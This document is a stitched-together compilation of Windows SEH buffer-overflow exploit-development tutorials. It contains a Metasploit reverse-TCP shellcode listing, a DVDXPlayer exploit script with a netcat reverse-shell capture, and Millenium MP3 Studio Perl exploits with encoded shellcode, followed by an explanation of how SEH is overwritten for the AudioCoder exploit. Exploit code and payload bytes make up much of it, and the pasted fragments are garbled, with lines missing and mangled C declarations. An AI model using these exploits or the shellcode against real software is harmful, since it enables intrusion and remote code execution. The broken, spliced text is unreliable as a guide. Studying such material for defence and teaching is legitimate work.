Module: payload/windows/shell_reverse_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
'\x00\x0A\x0D\x1A' -t c
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54";
#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html #
#----------------------------------------------------------------------------------#
# #
# G:\tutorial>ipconfig #
# ipconfig #
# #
# Windows IP Configuration #
# #
# #
# #
# IP Address. . . . . . . . . . . . : 192.168.111.128 #
# Default Gateway . . . . . . . . . : #
# #
# G:\tutorial> #
#----------------------------------------------------------------------------------#
filename="evil.plf"
#---------------------------------------------------------------------------------------------------------------#
#---------------------------------------------------------------------------------------------------------------#
shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
#----------------------------------------------------------------------------------#
# #
#----------------------------------------------------------------------------------#
# \----------------> #
# <-------/ #
# (2) nSEH jumps over SEH and redirects execution to our B's #
#----------------------------------------------------------------------------------#
textfile.write(buffer)
textfile.close()
In the screenshot below we can see the before and after output of the “netstat -an” command
and below that we have the backtrack terminal output of our reverse shell connection. Game
Over!!
Shell
root@bt:~/Desktop# nc -lvp 9988
192.168.111.128: inverse host lookup failed: Unknown server error : Connection timed out
G:\tutorial>ipconfig
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
Default Gateway . . . . . . . . . :
G:\tutorial>
https://www.fuzzysecurity.com/tutorials/expDev/3.html
I have indicated that SEH needs to be overwritten by a pointer to “pop pop ret” and that next
SEH needs to be overwritten with 6 bytes to jump over SEH… Of course, this structure was
based on the logic of most SEH based vulnerabilities, and more specifically on the vulnerability
in Easy RM to MP3 Player. So it’s just an example behind the concept of SEH based
vulnerabilities. You really need to look to all registers, work with breakpoints, etc, to see where
your payload / shellcode resides… look at your stack and then build the payload structure
accordingly… Just be creative.
Sometimes you get lucky and the payload can be built almost blindfolded. Sometimes you
don’t get lucky, but you can still turn a somewhat hard to exploit vulnerability into a stable
exploit that works across various versions of the operating system. And sometimes you will
need to hardcode addresses because that is the only way to make things work. Either way,
most exploits don’t look the same. They are manual and handcrafted work, based on the
specific properties of a given vulnerability and the available methods to exploit the
vulnerability.
In today’s tutorial, we’ll look at building an exploit for a vulnerability that was discovered in
Millenium MP3 Studio 1.0, as reported at http://www.milw0rm.com/exploits/9277.
The proof of concept script states that (probably based on the values of the registers), it’s easy
to exploit… but it did not seem to work for the person who discovered the flaw and posted this
PoC script.
Based on the values in the registers displayed by “Hack4love”, one could conclude that this is a
typical stack based overflow, where EIP gets overwritten with the junk buffer… so you need to
find the offset to EIP, find the payload in one of the registers, overwrite EIP with a “jump to…”
and that’s it ? Well… not exactly.
Let’ see. Create a file with “http://”+5000 A’s… What do you get when you run the application
via windbg and open the file ? We’ll create a mpf file :
my $sploitfile="c0d3r.mpf";
my $junk = "http://";
$junk=$junk."A"x5000;
my $payload=$junk;
open (myfile,">$sploitfile");
Open windbg and open the mp3studio executable. Run the application and open the file. (I’m
not going to repeat these instructions every time, I assume you know the drill by now)
00400000*** ERROR: Module load completed but symbols could not be loaded for image
Right, access violation… but the registers are nowhere near the ones mentioned in the PoC
script. So either the buffer length is wrong (to trigger a typical stack based EIP overwrite
overflow), or it’s a SEH based issue. Look at the SEH Chain to find out :
0:000> !exchain0012f9a0:
+41414140 (41414141)
ah, ok. Both the SE Handler and the next SEH are overwritten. So it’s a SEH based exploit.
Build another file with a 5000 character Metasploit pattern in order to find the offset to next
SEH and SE Handler :
0:000> !exchain0012f9a0:
+30684638 (30684639)
So SE Handler was overwritten with 0x39466830 (little endian, remember), and next SEH was
overwritten with 0x67384667
Now, in a typical SEH exploit, you would build your payload like this :
• – first 4105 junk characters (and get rid of some nasty characters such as the 2
backslashes after http: + added a couple of A’s to keep the amount of characters in
groups of 4)
or, in perl (still using some fake content just to verify the offsets) :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="BBBB";
my $seh="CCCC";
my $shellcode="D"x($totalsize-length($junk.$nseh.$seh));
my $payload=$junk.$nseh.$seh.$shellcode;
open (myfile,">$sploitfile");
close (myfile);
Crash :
00400000*** ERROR: Module load completed but symbols could not be loaded for
image00400000image
!exchain0012fb8c:
+43434342 (43434343)
So SE Handler was overwritten with 43434343 (4 C’s, as expected), and next SEH was
overwritten with 42424242 (4 B’s, as expected).
Let’s replace the SE Handler with a pointer to pop pop ret, and replace next SEH with 4
breakpoints. (no jumpcode yet, we just want to find our payload) :
Look at the list of loaded modules and try to find a pop pop ret in one of the modules. (You
can use the Ollydbg “SafeSEH” plugin to see whether the modules are compiled with safeSEH
or not).
xaudio.dll, one of the application dll’s, contains multiple pop pop ret’s. We’ll use the one at
0x1002083D :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $seh=pack('V',0x1002083D);
my $shellcode="D"x($totalsize-length($junk.$nseh.$seh));
my $payload=$junk.$nseh.$seh.$shellcode;#
open (myfile,">$sploitfile");
close (myfile);
At the first Access violation, we passed the exception back to the application. pop pop ret was
executed and you should end up on the breakpoint code (in nseh)
Now where is our payload ? It should look like a lot of D’s (after seh)… but it could be A’s as
well (at the beginning of the buffer – let’s find out) :
If the payload is after seh, (and the application stopped at our break), then EIP should now
point to the first byte of nseh (our breakpoint code), and thus a dump eip should show nseh,
followed by seh, followed by the shellcode :
0:000> d eip
Ok, that looks promising, however we can see some null bytes after about 32bytes (in blue)…
so we have 2 options : use the 4 bytes of code at nseh to jump over seh, and then use those 16
bytes to jump over the null bytes. Or jump directly from nseh to the shellcode.
First, let’s verify that we are really looking at the start of the shellcode (by replacing the first
D’s with some easily recognized data) :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="\xcc\xcc\xcc\xcc";
my $seh=pack('V',0x1002083D);
my $shellcode="A123456789B123456789C123456789D123456789";
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open (myfile,">$sploitfile");
efl=00000246+0x12f99f:
0012f9a0 cc int 3
0:000> d eip
Ok, so it is the beginning of the shellcode, but there is a little “hole” after the first couple of
shellcode bytes… (see null bytes in red)
Let’s say we want to jump over the hole, and start the shellcode with 4 NOP’s (so we can put
our real shellcode at 0012f9c0… basically use 24 NOP’s in total before the shellcode), then we
need to jump (from nseh) 30 bytes. (That’s 0xeb,0x1e), then we can do this :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $seh=pack('V',0x1002083D);
my $shellcode="\xcc\xcc\xcc\xcc";
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2;
open (myfile,">$sploitfile");
Open the mpf file and you should be stopped at the breakpoint (at 0x0012f9c0) after passing
the first exception to the application :
00400000*** ERROR: Module load completed but symbols could not be loaded for image
00400000image00400000+0x3734:
0:000> g
efl=00000246+0x12f9bf:
0012f9c0 cc int 3
Ok, now replace the breaks with real shellcode and finalize the script :
# -----------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
#
MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMM
MM?7MMMMMMMMMM: MMMMMMMMMMM:
#
MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM
?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$.
8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7.
8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7.
.MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~
MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# eip hunters
# -----------------------------------------------------------------------------
my $totalsize=5005;
my $sploitfile="c0d3r.m3u";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2;
#
print " [+] Writing exploit file $sploitfile\n";
open (myfile,">$sploitfile");
close (myfile);
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-
just-another-example-part-3b/
Introduction
The buffer overflow exploits covered so far in this tutorial series have generally involved some
form of direct EIP overwrite using a CALL or JMP instruction(s) to reach our shellcode. Today
we’ll take a look at a different approach using Windows Structured Exception Handling (SEH).
Before I begin explaining the basic mechanics of Windows Structured Exception Handling (as
it’s implemented in an x86, 32-bit environment) it bears mentioning that I intentionally
omitted several details (termination handling vs. exception handling, unwinding, vectored
exception handling, etc.) to focus on the basic concepts and to provide enough background
information to understand SEH in the context of exploit writing. I encourage you to read up on
these additional details using the references I’ve provided at the end of this post.
Structured Exception Handling (SEH) is a Windows mechanism for handling both hardware and
software exceptions consistently.
Those with programming experience might be familiar with the exception handling construct
which is often represented as a try/except or try/catch block of code. For the purposes of this
discussion, I’ll reference the Microsoft extension to the C/C++ languages which looks as
follows:
__try {
...
// the code to run in the event of an exception (aka the "exception handler)
...
The concept is quite simple — try to execute a block of code and if an error/exception occurs,
do whatever the “except” block (aka the exception handler) says. The exception handler is
nothing more than another block of code that tells the system what to do in the event of an
exception. In other words, it handles the exception.
Regardless of where the exception handler is defined (application vs. OS) or what type of
exception it is designed to handle, all handlers are managed centrally and consistently by
Windows SEH via a collection of designated data structures and functions, which I’ll cover at a
high level in the next section.
For every exception handler, there is an Exception Registration Record structure which looks
like this:
PEXCEPTION_ROUTINE Handler;
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
source: http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx
These registration records are chained together to form a linked list. The first field in the
registration record (*Next) is a pointer to the next _EXCEPTION_REGISTRATION_RECORD in the
SEH chain. In other words, you can navigate the SEH chain from top to bottom by using
the *Next address. The second field (Handler), is a pointer to an exception handler function
which looks like this:
EXCEPTION_DISPOSITION
__cdecl _except_handler(
oid EstablisherFrame,
void * DispatcherContext
);
The first function parameter is a pointer to an _EXCEPTION_RECORD structure. As you can see
below, this structure holds information about the given exception including the exception
code, exception address, and number of parameters.
DWORD ExceptionCode;
DWORD ExceptionFlags;
struct _EXCEPTION_RECORD *ExceptionRecord;
PVOID ExceptionAddress;
DWORD NumberParameters;
DWORD ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;
source: http://www.microsoft.com/msj/0197/exception/exception.aspx
The _except_handler function uses this information (in addition to the registers data provided
in the ContextRecord parameter) to determine if the exception can be handled by the current
exception handler or if it needs to move to the next registration record.
The EstablisherFrame parameter also plays an important role, which we’ll get to in a bit.
So how does Windows SEH use the registration record, handler function, and exception record
structure when trying to handle an exception? When an exception occurs, the OS starts at the
top of the chain and checks the first _EXCEPTION_REGISTRATION_RECORD Handler function to
see if it can handle the given error (based on the information passed in
the ExceptionRecord and ContextRecord parameters). If not, it will move to the
next _EXCEPTION_REGISTRATION_RECORD (using the address pointed to by *Next). It will
continue moving down the chain in this manner until it finds the appropriate exception
handler function. Windows places a default/generic exception handler at the end of the chain
to help ensure the exception will be handled in some manner (represented by FFFFFFFF) at
which point you’ll likely see the “…has encountered a problem and needs to close” message.
Each thread has its own SEH chain. The OS knows how to locate the start of this chain by
referencing the ExceptionList address of the thread information/environment block (TIB/TEB)
which is located at FS:[0]. Here’s a basic diagram of the Windows SEH chain with a simplified
version of the _EXCEPTION_REGISTRATION_RECORD:
This is by no means a complete overview of SEH or all of its data structures, but it should
provide you with enough detail to understand the fundamental concepts. Now let’s take a look
at SEH in the context of an actual application.
SEH Example
Let’s take a look at how SEH is implemented in practice, using Windows Media Player as an
example. Recall from Part 1 of this exploit series that you can view the contents of the TEB
using the !teb command in WinDbg. Here is a snapshot of the running process threads and a
look at one of the associated TEBs for Windows Media Player (on a Win XP SP3 machine):
Notice the ExceptionList address. This is the address of the start of the SEH chain for that
thread (yours may vary). In other words, this address points to the
first _EXCEPTION_REGISTRATION_RECORD in the SEH chain. Let’s take a look at how to find
this same information in Immunity Debugger.
After attaching Windows Media Player to Immunity, you can hit Alt+M to view the Memory
Modules. In this example, I’ll double-click the same thread examined in WinDbg (00013C20).
This opens up the Dump window for that thread, which you’ll notice is the TEB. Just as in
WinDbg, you’ll see that the start of the SEH chain is located at 02B6FF5C.
Another way to find the start of the SEH chain for the current thread is by dumping FS:[0] as
follows:
Again, notice the first address is 02B6FF5C which in turn, points to 02B6FFDC (the start of the
SEH chain).
The final, and easiest method of viewing the SEH chain in Immunity is by hitting Alt+S:
No surprise, the first entry in the chain is 02B6FF5C. What this SEH chain window also clearly
shows is that there are two _EXCEPTION_REGISTRATION_RECORDs for this thread (SEH chain
length = 2) and they both point to the same exception handler function.
If you take a look at the stack for this thread (towards the bottom), you’ll be able to see this
SEH chain, starting at 02B6FF5C.
Again, you can see both registration records in the SEH chain — the first is the start of the
chain located at 02B6FF5C and the second is the default handler (as indicated by FFFFFFFF /
“End of SEH Chain“) at 02B6FFDC.
Exploiting SEH
Now that you have an idea of how Windows SEH works and how to locate the SEH chain in
Immunity, let’s see how it can be abused to craft reliable exploits. For this example, I’m going
to use the basic C program example from Part 1 of this exploit series (original source:
Wikipedia).
For demo purposes I’ve compiled it using MS Visual Studio Command Line with the /Zi switch
(for debugging) and /GS- switch (to remove stack cookie protection). Running the program
with an argument of 10 A’s (stack_demo.exe AAAAAAAAAA) you can see that by default there
are two entries in the SEH chain (neither of which are explicitly defined in the application code
itself).
To further illustrate how Windows SEH centrally manages all exceptions (regardless of where
they are defined) I’ll add a __try/__except block to this example program and lengthen the
SEH chain by one.
The added __except block doesn’t have any exception handling code but as you can see in the
next screenshot, the new exception handler has been added to the top of the SEH chain.
If you want to walk through the the addition of this new entry to the SEH chain, set a couple of
breakpoints before and after function foo( ) is called. Since this was compiled with debugging
enabled you can easily do this in Immunity by going to View–>Source Files and clicking on the
name of the executable (in my case I named the updated version stack_demo_seh.exe).
Select the line(s) where you’d like to enable a breakpoint and hit F2. In my case I put one right
before the call to foo( ) (to see the addition of the new SEH registration record) and one right
before the call to strcpy (so I can step through writing of the arg to the stack).
After hitting our breakpoints and stepping though execution of strcpy (using F7), you should
see the new _EXCEPTION_REGISTRATION_RECORD on the stack above the previous two
entries.
Let me take this opportunity to highlight a few of the other surrounding entries on the stack
(Note: you won’t see stack cookies here since I used /GS when compiling).
As you can see, the local variables are written to the stack right above the SEH record. In this
case our 10 character argument fits within the allocated buffer, but because there is no
bounds checking with strcpy( ), if we were to make it larger, we can overwrite the values of
Next SEH and SEH.
Let’s try by passing 28 A’s as an argument (you can pass arguments in Immunity via File ->
Open).
Viewing the the SEH chain (Alt+S) you should see this:
Clearly we’ve overwritten our SEH chain, but this alone is not enough to lead to a viable
exploit. In addition to controlling the values of Next SEH and SEH we also need to trigger an
exception so that the exception handler is called by the OS. What exactly will trigger an
exception (and which handler is called) is going to be dependent upon the application but
quite often it is enough to simply continue writing beyond the end of the stack to generate an
error that results in the OS calling the SEH chain.
With this example program, we know that 28 A’s is just enough to overwrite Next SEH and
SEH. This time let’s make the total length of our argument 500 only instead of using all A’s,
let’s use the letter B for character positions 21-28. The length should be enough to overwrite
the stack to a point that it generates an exception and we should see Next SEH and SEH
overwritten with B’s.
By overwriting SEH (which is called when an exception occurs), we have taken control of EIP.
But how can we use this to execute shellcode? The answer lies in the second parameter of
the _except_handler function we examined earlier.
EXCEPTION_DISPOSITION
__cdecl except_handler(
_EXCEPTION_RECORD *ExceptionRecord,
oid EstablisherFrame,
void * DispatcherContext
);
When this Exception Handler function is called, the EstablisherFrame value is placed on the
stack at ESP+8. This EstablisherFrame value is actually the address of
our _EXCEPTION_REGISTRATION_RECORD which, as we’ve already established, starts with
Next SEH (also under our control).
So, when an exception occurs and the Exception Hander (SEH) is called, it’s value is put in EIP.
Since we have control over SEH, we now have control over EIP and the execution flow of the
application. We also know that the EstablisherFrame (which starts with Next SEH) is located at
ESP+8, so if we can load that value into EIP we can continue to control the execution flow of
the application.
Here’s a screenshot of EIP and the stack at the time the Exception Handler is executed:
So how do we get the EstablisherFrame/_EXCEPTION_REGISTRATION_RECORD address loaded
into EIP? There are several possible approaches, the most common of which is to overwrite
SEH with the address for a POP+POP+RET instruction to load ESP+8 into EIP.
Using the above screenshot as an example, instead of 42424242, EIP would be overwritten
with the address of a POP+POP+RET sequence. This would pop the first two entries off of the
stack and the return instruction would load 0012FF5C (the address of
the _EXCEPTION_REGISTRATION_RECORD) into EIP. Since we have control over the contents of
that address, we could then execute code of our choosing.
Since this basic demo code has no usable pop + pop + ret instructions, let’s turn our attention
to a real-world vulnerable application and apply what we’ve covered into developing a working
SEH exploit.
Before we start writing any code, let’s first take a look at the typical construct for an SEH
exploit. The most basic SEH exploit buffer is going to be constructed as follows:
It will start with some filler/junk to offset the buffer to the exact overwrite of Next SEH and
SEH. Remember, SEH will be loaded into EIP when the exception is triggered. Since it will
contain a POP+POP+RET instruction, the address to
the _EXCEPTION_REGISTRATION_RECORD located at ESP+8 will then be loaded into EIP.
Program execution will then immediately hit Next SEH and execute whatever instruction
resides there. In this basic SEH exploit one would generally control everything on the stack
from Next SEH onward. This means that we can place our shellcode immediately after SEH. The
problem we run into is that when program flow is redirected to Next SEH, it will once again run
into SEH unless we can figure out a way around it. To do so, we can place a short jump in Next
SEH, which will hop over SEH and into our shellcode.
For this SEH Exploit exercise, I’ll use one of my published exploits for AudioCoder 0.8.22. You
can download the vulnerable application directly from this link: http://www.exploit-
db.com/exploits/29309/. I’ll start from scratch so you can see how the exploit is built, step-by-
step.
Once you’ve installed/launched AudioCoder attach Immunity Debugger and run (F9). This
particular program is vulnerable to a buffer overflow condition as it does not perform any
bounds checking when reading an .m3u file. To verify this vulnerability, first create an .m3u file
with a 5000 character Metasploit pattern. Recall the command to create this pattern in Kali
is ../metasploit-framework/tools/pattern_create.rb 5000. You can copy the pattern into a perl
script and create the m3u file as follows (don’t forget the “http://”):
When you open the resulting .m3u file within AudioCoder, you should see something similar to
the following in Immunity:
As you can see, we’ve overwritten EIP as well as our SEH Registration Record with our
Metasploit pattern. You can examine the SEH chain (Alt+S) to verify.
Remember that we have control over EIP because we’ve overwritten SEH. We also know that
at the time of crash, ESP+8 points to Next SEH. So, if we can overwrite SEH with the address of
a POP+POP+RET instruction we can redirect execution flow to Next SEH. There’s a couple of
ways to search for a usable POP+POP+RET instruction in Immunity. First, you can right click on
the Disassembly window (top left) and select “Search for” –> “All sequences in all modules”. To
use this method you need to know the registers you wish to include in the POP instructions.
For example:
This particular choice of registers returns many results to choose from. Remember that
instructions that reside in an application (vs. OS) module are preferred for exploit portability.
Another way to find the POP+POP+RET instruction address is to use the mona plugin for
Immunity (!mona seh):
The benefit of using mona is that it also identifies which modules have been compiled with
SafeSEH, a protection that would eliminate the viability of an SEH-based exploit. I’ll explain
more about SafeSEH in the next section, but for now just remember to avoid modules that
have been compiled with it. Lucky for us, AudioCoder has plenty of non-SafeSEH modules to
choose from!
Once we’ve chosen a usable POP+POP+RET instruction (I chose 6601228E which is a POP EDI +
POP EBP + RET instruction from AudioCoder/libiconv-2.dll) the next thing we need to do is
figure out the offset to Next SEH. As you may remember from previous tutorials, there are a
couple of ways to do this. You can use pattern_offset.rb to determine the offset for 7A41327A.
So we have our POP+POP+RET address and our offset. Now all we need is some jump code for
Next SEH and our Shellcode.
The jump code we need for Next SEH only needs to get us past the 4 bytes of SEH. If you recall
from part 4 of the series, a short forward jump is represented by opcode EB. For
example \xeb\x14 is a 20 byte forward jump. We can jump a bit beyond SEH as long as we
preface our shellcode with some NOPs.
So, we have:
At this point we’re ready to construct our exploit which I’ve included below:
#!/usr/bin/perl
#############################################################################
##
# Exploit Title: AudioCoder 0.8.22 (.m3u) – SEH Buffer Overflow
# Date: 10-18-2013
# Exploit Author: Mike Czumak (T_v3rn1x) — @SecuritySift
# Vulnerable Software: AudioCoder 0.8.22 (http://www.mediacoderhq.com/audio/)
# Software Link: http://www.fosshub.com/download/AudioCoder-0.8.22.5506.exe
# Version: 0.8.22.5506
# Tested On: Windows XP SP3
# Creates an .m3u file to exploit basic seh bof
#############################################################################
##
Open the resulting m3u file in AudioCoder (without a debugger) and you should see:
Alternatives to the POP+POP+RET
If you cannot locate a usable POP+POP+RET instruction, you may be able to reach your
shellcode in a different manner. Take another look at the following screenshot from our earlier
basic C program example once again.
Not only does ESP+8 point to our Next SEH address – so does ESP+14, ESP+1c, etc. This gives us
some additional options for calling this address.
Popad
One such option is the popad, instruction, which I’ve covered in an earlier tutorial.
Recall popad pops the first eight values from the stack and into the registers in the following
order: EDI, ESI, EBP, EBX, EDX, ECX, and EAX (ESP is discarded). A single popad instruction will
therefore leave the address to Next SEH in EBP, EDX, and EAX. To use this method in our SEH
exploit we would need to not only find a popad instruction but one that also has a JMP/CALL
EBP, JMP/CALL EDX, or JMP/CALL EAX instruction immediately after it. This particular
AudioCoder application had no such set of instructions.
If there are no usable popad or POP+POP+RET instructions, you may try to jump directly to
Next SEH on the stack by finding a JMP or CALL instruction to an offset to ESP (+8, +14, +1c,
+2c, etc) or EBP (+c, +24, +30, etc). Again, the AudioCoder application did not have any usable
instructions to demonstrate this technique.
The key to both of these options is that just as with POP+POP+RET you must select instructions
from modules that were not compiled with SafeSEH or the exploit will fail. You will also want
to avoid addresses containing null bytes.
Without going into too much detail about protections such as stack cookies and ASLR (which
I’ll save for another post), I want to briefly touch on two protections that target SEH exploits
